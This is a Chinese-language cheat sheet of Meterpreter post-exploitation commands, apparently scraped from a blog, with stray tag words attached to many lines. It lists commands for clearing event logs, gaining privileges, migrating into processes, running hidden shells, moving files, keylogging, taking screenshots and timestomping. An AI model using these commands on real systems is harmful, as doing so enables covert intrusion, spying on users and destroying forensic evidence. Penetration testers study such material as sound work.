meterpreter
meterpreter是Metasploit框架中的一个扩展模块,做为溢出成功之后的攻击载荷使用.为后渗透提供了不少便捷之处shell
基础命令
咱们进入meterpreter以后,键入 ? 便可进入帮助文档. 咱们进入帮助文档能够看到帮助文档被分红了好几个模块...ruby
Core Commands(基础命令)
? 帮助文档网络
background 让meterprter处于后台模式session
sessions -i [id] 与会话进行交互,id表示会话的id号框架
quit 退出会话ui
shell 得到控制台权限(前提是在meterpreter环境下,exit退出当前shell,返回到meterpreter)spa
irb 开启ruby终端操作系统
shutdown 关机日志
reboot 重启接口
clearev 清除目标机器上的事件日志
sysinfo 查看目标系统信息 好比主机名,ip.操做系统等
getprivs 获取尽量多的特权
getuid 查看权限
kill [pid] 杀死进程
write 给支持的信道中写数据
execute -H -i -f cmd.exe 建立新进程cmd -H不可见,-i交互
migrate pid 将meterpreter会话移植到进程数为pid的进程中
getpid 查看当前进程的pid
ps 查看当前活跃进程
File system Commands(文件相关)
cat 查看文件内容
show_mount 查看目标机磁盘系统
getwd 查看当前工做目录
search -f 搜索指定文件(-h进入帮助手册). 还能够搜索类型. 还支持通配符. 例如 search -f *.txt ,搜索到某个文件后能够使用cat查看
edit 对指定文件进行编辑
download 对指定文件进行下载
upload 对指定文件上传, 后面跟上要上传的路径和目标系统保存的路径
cp 复制文件. 参数等同上传文件
rm 删除文件
dir 列出当前目录下的文件
mkdir 新建文件夹
rmdir 删除文件夹
lcd 返回本机上一层目录
lpwd 显示本机工做路径
Networking Commands(网络相关)
ipconfig/ifconfig 查看网络接口信息
route 获取路由表信息
portfwd 端口转发
System Commands(网络相关)
User interface Commands(用户界面)
screenshot 截屏
keyscan_start 开启键盘监听
keyscan_dump 导出键盘记录的内容
keyscan_stop 中止键盘记录的内容
getdesktop 开启当前的meterpreter工做桌面
enumdesktops 列出全部可访问桌面站和窗口站
Webcan Commands(摄像头相关)
Elevate Commands(提权相关)
Timestomp 更改文件属性(MACE)